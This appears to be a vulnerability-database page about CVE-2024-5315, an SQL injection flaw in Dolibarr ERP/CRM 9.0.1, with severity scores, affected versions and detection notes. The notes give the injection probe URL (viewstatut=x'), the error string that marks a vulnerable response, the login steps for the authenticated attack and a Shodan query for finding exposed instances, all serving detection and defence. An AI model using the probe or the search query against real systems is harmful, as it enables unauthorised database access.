cbcvebase.
CVE-2024-5315
published 2024-05-24

CVE-2024-5315: Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a…

PriorityP278critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
EXPLOIT
EPSS
32.87%
98.1th percentile
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php.

Affected

3 ranges
VendorProductVersion rangeFixed in
dolibarrdolibarr0 – 9.0.1
dolibarrdolibarr_erp_crm
dolibarrerp_cms

Detection & IOCsextracted from sources · hover to see the quote

path/dolibarr/commande/list.php
path/htdocs/commande/list.php
url/htdocs/commande/list.php?viewstatut=x%27
  • SQL injection is triggered via the `viewstatut` GET parameter in `/htdocs/commande/list.php`. A single-quote payload (`x'`) causes a MySQL syntax error visible in the response body.
  • Exploitation requires prior authentication. Detect a successful login by checking for the `Set-Cookie: DOLSESSID_` header in the response to the login POST request.
  • A vulnerable response to the SQL injection probe contains the string 'You have an error in your SQL syntax' in the response body.
  • Authentication endpoint for Dolibarr is `/htdocs/index.php?mainmenu=home` via POST with parameters `loginfunction`, `username`, and `password`. Successful admin login response body contains 'SuperAdmin'.
  • Shodan query to identify exposed Dolibarr instances: `http.title:"Dolibarr"`
  • ·Exploitation requires valid credentials (authenticated attack). The Nuclei template uses `{{username}}` and `{{password}}` variables that must be supplied at runtime.
  • ·The vulnerability specifically affects Dolibarr ERP/CRM version 9.0.1. Confirm the target version before testing.

CVSS provenance

nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
osv9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.